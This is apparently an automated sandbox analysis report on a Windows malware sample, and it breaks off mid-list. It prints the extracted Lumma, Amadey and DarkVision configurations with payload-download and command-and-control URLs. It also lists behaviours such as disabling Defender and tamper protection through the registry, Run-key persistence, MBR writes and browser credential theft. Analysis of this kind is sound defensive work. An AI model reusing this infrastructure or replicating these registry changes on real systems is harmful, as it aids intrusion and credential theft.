Resubmissions
20/04/2025, 02:25
250420-cwqv9sz1bz 1019/04/2025, 21:06
250419-zxwt8sxmt7 1019/04/2025, 11:21
250419-nf95raxj18 10Analysis
-
max time kernel
372s -
max time network
373s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250410-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250410-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
20/04/2025, 02:25
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win10ltsc2021-20250410-en
General
-
Target
random.exe
-
Size
1.8MB
-
MD5
a4442e4267d3d5b639f79f08b52bbb1b
-
SHA1
e4741a2091c03939fb2c7f8eb2be940b09d42131
-
SHA256
f2584f132a6e2588475dd0dbcb480d0e84988029d54d8bea33b0410df1734a58
-
SHA512
fab6972044ce38728a7765d19f05b5c2d198e61eaa36762559a1964a9eea8f0a1fe45df9bfeb2603e25d02c5c9cd97885d55e9cb75f0186880dd279e5eed0ccc
-
SSDEEP
49152:fbwoAqWRZQ5mDPf47OXC6h0X4eOPy4DK:jTCZ+mDPQ7+C6WPOVDK
Malware Config
Extracted
http://185.39.17.162/testmine/random.exe
Extracted
lumma
https://clarmodq.top/qoxo
https://opiratetwrath.run/ytus
https://.changeaie.top/geps
https://quilltayle.live/gksi
https://liftally.top/xasj
https://nighetwhisper.top/lekd
https://4asalaccgfa.top/gsooz
https://zestmodp.top/zeda
https://starofliught.top/wozd
https://meerkaty.digital/sagf
https://piratetwrath.run/ytus
https://changeaie.top/geps
https://ssalaccgfa.top/gsooz
https://jawdedmirror.run/ewqd
https://lonfgshadow.live/xawi
https://3liftally.top/xasj
https://.nighetwhisper.top/lekd
https://salaccgfa.top/gsooz
https://owlflright.digital/qopy
https://nchangeaie.top/geps
https://7salaccgfa.top/gsooz
https://xstarofliught.top/wozd
https://v0salaccgfa.top/gsooz
https://schangeaie.top/geps
https://4zestmodp.top/zeda
Extracted
amadey
5.34
8ac6b9
http://185.215.113.59
-
install_dir
f1e82329e5
-
install_file
namez.exe
-
strings_key
022d16de15289562e076160ac426da7d
-
url_paths
/Dy5h4kus/index.php
Extracted
darkvision
82.29.67.160
-
url
http://107.174.192.179/data/003
https://grabify.link/ZATFQO
http://107.174.192.179/clean
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Signatures
-
Amadey family
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Detects Healer an antivirus disabler dropper 1 IoCs
resource yara_rule behavioral1/memory/2104-37816-0x0000000000740000-0x0000000000BBE000-memory.dmp healer -
Detects Rhadamanthys payload 1 IoCs
resource yara_rule behavioral1/memory/3108-35472-0x00000000063B0000-0x00000000064D2000-memory.dmp Rhadamanthys_v8 -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 419748d64b.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 419748d64b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 419748d64b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 419748d64b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 419748d64b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 419748d64b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 419748d64b.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 419748d64b.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 419748d64b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 419748d64b.exe -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 3108 created 3088 3108 iexpress.exe 51 PID 3108 created 3088 3108 iexpress.exe 51 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 23f282f58a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7IPCJFu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 21d3425115.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7IPCJFu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6a172933cd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 419748d64b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6ad67669e5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GitcS6s.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GitcS6s.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 264 11748 powershell.exe 266 11748 powershell.exe 548 3664 powershell.exe 763 6348 powershell.exe 764 6348 powershell.exe -
pid Process 10276 powershell.exe 10024 powershell.exe 8148 powershell.exe 11748 powershell.exe 6348 powershell.exe 2756 powershell.exe 13064 powershell.exe 12396 powershell.exe 3664 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 25 IoCs
flow pid Process 59 5608 svchost.exe 102 5704 namez.exe 102 5704 namez.exe 173 5704 namez.exe 173 5704 namez.exe 207 5704 namez.exe 207 5704 namez.exe 207 5704 namez.exe 755 11532 svchost015.exe 164 2740 MSBuild.exe 459 6216 6a172933cd.exe 546 5704 namez.exe 29 5704 namez.exe 29 5704 namez.exe 29 5704 namez.exe 29 5704 namez.exe 29 5704 namez.exe 432 5704 namez.exe 432 5704 namez.exe 432 5704 namez.exe 432 5704 namez.exe 23 5224 random.exe 266 11748 powershell.exe 682 7960 MSBuild.exe 764 6348 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\klupd_acefa3e1a_arkmon.sys 8101ae6c.exe File created C:\Windows\System32\Drivers\klupd_acefa3e1a_klbg.sys 8101ae6c.exe File created C:\Windows\System32\Drivers\acefa3e1.sys 8101ae6c.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\Debugger = "C:\\Windows\\SECOH-QAD.exe" KMSELDI.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe AutoPico.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe KMSELDI.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\Debugger = "C:\\Windows\\SECOH-QAD.exe" KMSELDI.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe KMSELDI.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe KMSELDI.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\Debugger = "C:\\Windows\\SECOH-QAD.exe" AutoPico.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe AutoPico.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe KMSELDI.exe -
Sets service image path in registry 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_acefa3e1a_klark\ImagePath = "System32\\Drivers\\klupd_acefa3e1a_klark.sys" 8101ae6c.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_acefa3e1a_mark\ImagePath = "System32\\Drivers\\klupd_acefa3e1a_mark.sys" 8101ae6c.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_acefa3e1a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_acefa3e1a_arkmon.sys" 8101ae6c.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\acefa3e1\ImagePath = "System32\\Drivers\\acefa3e1.sys" 8101ae6c.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_acefa3e1a_arkmon\ImagePath = "System32\\Drivers\\klupd_acefa3e1a_arkmon.sys" 8101ae6c.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_acefa3e1a_klbg\ImagePath = "System32\\Drivers\\klupd_acefa3e1a_klbg.sys" 8101ae6c.exe -
Uses browser remote debugging 2 TTPs 12 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 10276 chrome.exe 10880 chrome.exe 10656 msedge.exe 7324 chrome.exe 2952 chrome.exe 8908 chrome.exe 10140 chrome.exe 11408 chrome.exe 8936 chrome.exe 12664 msedge.exe 10572 msedge.exe 4412 chrome.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 21d3425115.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 419748d64b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6ad67669e5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 23f282f58a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7IPCJFu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 21d3425115.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GitcS6s.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6ad67669e5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GitcS6s.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GitcS6s.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 419748d64b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7IPCJFu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GitcS6s.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7IPCJFu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7IPCJFu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6a172933cd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6a172933cd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 23f282f58a.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation lBiQciH.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation FC8EB13MXLKFC6SOSHM0CW5GA1.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation namez.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation lBiQciH.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation 525ffce19b.tmp Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation mshta.exe -
Deletes itself 1 IoCs
pid Process 2316 w32tm.exe -
Drops startup file 5 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VCjEYwFNPKlVq.bat 8101ae6c.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VCjEYwFNPKlVq.bat powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BrokPyR.exe BrokPyR.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VCjEYwFNPKlVq.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BrokPyR.exe 8101ae6c.exe -
Executes dropped EXE 64 IoCs
pid Process 4544 FC8EB13MXLKFC6SOSHM0CW5GA1.exe 5704 namez.exe 3932 1fb3acb064.exe 4604 LAc2heq.exe 2696 Hmcm0Oj.exe 3244 235T1TS.exe 1404 xztOH3r.exe 5980 tzutil.exe 2316 w32tm.exe 13152 21d3425115.exe 6932 i5Kz53x.exe 1384 GitcS6s.exe 7404 namez.exe 8916 7IPCJFu.exe 9760 5be2288.exe 10192 ZskZOgxSzfJebDEwQ.exe 10520 zBbvtJ0.exe 11220 8101ae6c.exe 12968 WE297Tp.exe 1752 BrokPyR.exe 12768 BrokPyR.exe 7560 lBiQciH.exe 12276 ynjrybyoa.exe 12128 ynjrybyoa.exe 12752 namez.exe 10020 525ffce19b.exe 10264 525ffce19b.tmp 10584 KMSpico.exe 10676 KMSpico.tmp 10592 core.exe 10756 info.exe 2312 518661c5fc.exe 6216 6a172933cd.exe 9424 UninsHs.exe 9068 KMSELDI.exe 2104 419748d64b.exe 9196 ZH66FT2SF3KZS55G4K6E7.exe 3548 b9c645bc7c.exe 9320 ccabf7b229.exe 1884 6ad67669e5.exe 8028 SECOH-QAD.exe 8272 tmpir8pchlk.exe 9836 BrokPyR.exe 11532 svchost015.exe 13028 BrokPyR.exe 5536 i5Kz53x.exe 5828 AutoPico.exe 8060 23f282f58a.exe 10100 namez.exe 10352 GitcS6s.exe 10292 Hmcm0Oj.exe 12792 zBbvtJ0.exe 1372 7IPCJFu.exe 6584 ZskZOgxSzfJebDEwQ.exe 12808 235T1TS.exe 10108 KMSELDI.exe 8436 LAc2heq.exe 11832 xztOH3r.exe 12568 WE297Tp.exe 12700 lBiQciH.exe 3712 utxikedhsa.exe 3424 utxikedhsa.exe 12792 tmpd8i_9vv4.exe 6484 namez.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Wine 6ad67669e5.exe Key opened \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Wine 23f282f58a.exe Key opened \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Wine GitcS6s.exe Key opened \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Wine 7IPCJFu.exe Key opened \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Wine 21d3425115.exe Key opened \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Wine 7IPCJFu.exe Key opened \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Wine 6a172933cd.exe Key opened \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Wine GitcS6s.exe Key opened \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Wine 419748d64b.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\acefa3e1.sys 8101ae6c.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\acefa3e1.sys\ = "Driver" 8101ae6c.exe -
Loads dropped DLL 64 IoCs
pid Process 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 12768 BrokPyR.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 11220 8101ae6c.exe 8176 SppExtComObj.exe 13028 BrokPyR.exe 13028 BrokPyR.exe 13028 BrokPyR.exe 13028 BrokPyR.exe 13028 BrokPyR.exe 13028 BrokPyR.exe 13028 BrokPyR.exe 13028 BrokPyR.exe 13028 BrokPyR.exe 13028 BrokPyR.exe 13028 BrokPyR.exe 13028 BrokPyR.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 419748d64b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 419748d64b.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\d883fe50-0491-44e1-a09d-494a30983a86 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{8525131a-9876-4fef-90f2-de1ba3475201}\\d883fe50-0491-44e1-a09d-494a30983a86.cmd\"" 8101ae6c.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\419748d64b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10064750101\\419748d64b.exe" namez.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9c645bc7c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10064760101\\b9c645bc7c.exe" namez.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ynjrybyoa.exe = "C:\\Users\\Admin\\AppData\\Local\\uqthrtzoqetw\\ynjrybyoa.exe" lBiQciH.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6a172933cd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10064740101\\6a172933cd.exe" namez.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ccabf7b229.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10064770101\\ccabf7b229.exe" namez.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\utxikedhsa.exe = "C:\\Users\\Admin\\AppData\\Local\\pdgebznlgy\\utxikedhsa.exe" lBiQciH.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\KasperskyLab 8101ae6c.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Public\desktop.ini firefox.exe File opened for modification C:\Users\Public\Documents\desktop.ini firefox.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: 8101ae6c.exe -
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe KMSELDI.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe AutoPico.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe KMSELDI.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 764 raw.githubusercontent.com 797 pastebin.com 265 raw.githubusercontent.com 266 raw.githubusercontent.com 458 pastebin.com 460 pastebin.com 550 pastebin.com -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 21d3425115.exe File opened for modification \??\PhysicalDrive0 8101ae6c.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000028552-37365.dat autoit_exe behavioral1/files/0x0009000000027252-37466.dat autoit_exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\Vestris.ResourceLib.dll KMSpico.tmp File created C:\Windows\system32\is-J7BIL.tmp KMSpico.tmp File created C:\Windows\system32\is-PDM9D.tmp KMSpico.tmp -
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
pid Process 5224 random.exe 13152 21d3425115.exe 1384 GitcS6s.exe 8916 7IPCJFu.exe 12128 ynjrybyoa.exe 12276 ynjrybyoa.exe 12276 ynjrybyoa.exe 12128 ynjrybyoa.exe 6216 6a172933cd.exe 1884 6ad67669e5.exe 8060 23f282f58a.exe 10352 GitcS6s.exe 1372 7IPCJFu.exe 3712 utxikedhsa.exe 3424 utxikedhsa.exe 3712 utxikedhsa.exe 3424 utxikedhsa.exe -
Suspicious use of SetThreadContext 15 IoCs
description pid Process procid_target PID 3932 set thread context of 2840 3932 1fb3acb064.exe 96 PID 4604 set thread context of 3752 4604 LAc2heq.exe 99 PID 1404 set thread context of 1320 1404 xztOH3r.exe 115 PID 6932 set thread context of 2740 6932 i5Kz53x.exe 134 PID 10520 set thread context of 12084 10520 zBbvtJ0.exe 159 PID 12968 set thread context of 5576 12968 WE297Tp.exe 202 PID 2312 set thread context of 7152 2312 518661c5fc.exe 409 PID 8272 set thread context of 8868 8272 tmpir8pchlk.exe 459 PID 1884 set thread context of 11532 1884 6ad67669e5.exe 462 PID 5536 set thread context of 7960 5536 i5Kz53x.exe 504 PID 12792 set thread context of 7532 12792 zBbvtJ0.exe 486 PID 8436 set thread context of 12440 8436 LAc2heq.exe 493 PID 11832 set thread context of 4424 11832 xztOH3r.exe 496 PID 12568 set thread context of 12016 12568 WE297Tp.exe 498 PID 12792 set thread context of 5460 12792 tmpd8i_9vv4.exe 525 -
resource yara_rule behavioral1/files/0x00070000000283c7-37246.dat upx behavioral1/memory/9424-37247-0x0000000000400000-0x0000000000417000-memory.dmp upx behavioral1/memory/9424-37249-0x0000000000400000-0x0000000000417000-memory.dmp upx behavioral1/memory/8868-38099-0x00007FF64DA70000-0x00007FF64E343000-memory.dmp upx behavioral1/memory/5460-40364-0x00007FF7EB730000-0x00007FF7EC003000-memory.dmp upx -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 5be2288.exe File opened (read-only) \??\VBoxMiniRdrDN 8101ae6c.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\KMSpico\UninsHs.exe KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\Access\is-Q33KJ.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\Standard\is-CD4AJ.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2016\Excel\is-9AP4G.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2016\Word\is-84D33.tmp KMSpico.tmp File created C:\Program Files\KMSpico\scripts\is-5UP6F.tmp KMSpico.tmp File created C:\Program Files\KMSpico\TokensBackup\Windows\cache\cache.dat KMSELDI.exe File created C:\Program Files\KMSpico\cert\kmscert2010\PowerPoint\is-FITAD.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2013\Excel\is-RAHU1.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2013\Outlook\is-THOEQ.tmp KMSpico.tmp File created C:\Program Files\KMSpico\scripts\is-J9D81.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\Access\is-H0DOM.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2010\OneNote\is-LGST7.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2013\Outlook\is-65NB5.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW6\Business\is-I82CD.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW7\Professional\is-KL1UF.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW8\CoreSingleLanguage\is-I8QVJ.tmp KMSpico.tmp File opened for modification C:\Program Files\KMSpico\TokensBackup\Keys.txt KMSELDI.exe File created C:\Program Files\KMSpico\cert\kmscert2010\Standard\is-84SHC.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2013\Lync\is-SCONM.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2013\ProPlus\is-DHFTM.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2013\Publisher\is-15EHL.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscert2016\is-ARHBC.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW7\Embedded\is-09TNS.tmp KMSpico.tmp File created C:\Program Files\KMSpico\cert\kmscertW7\Professional\is-LI4B4.tmp KMSpico.tmp File created C:\Program 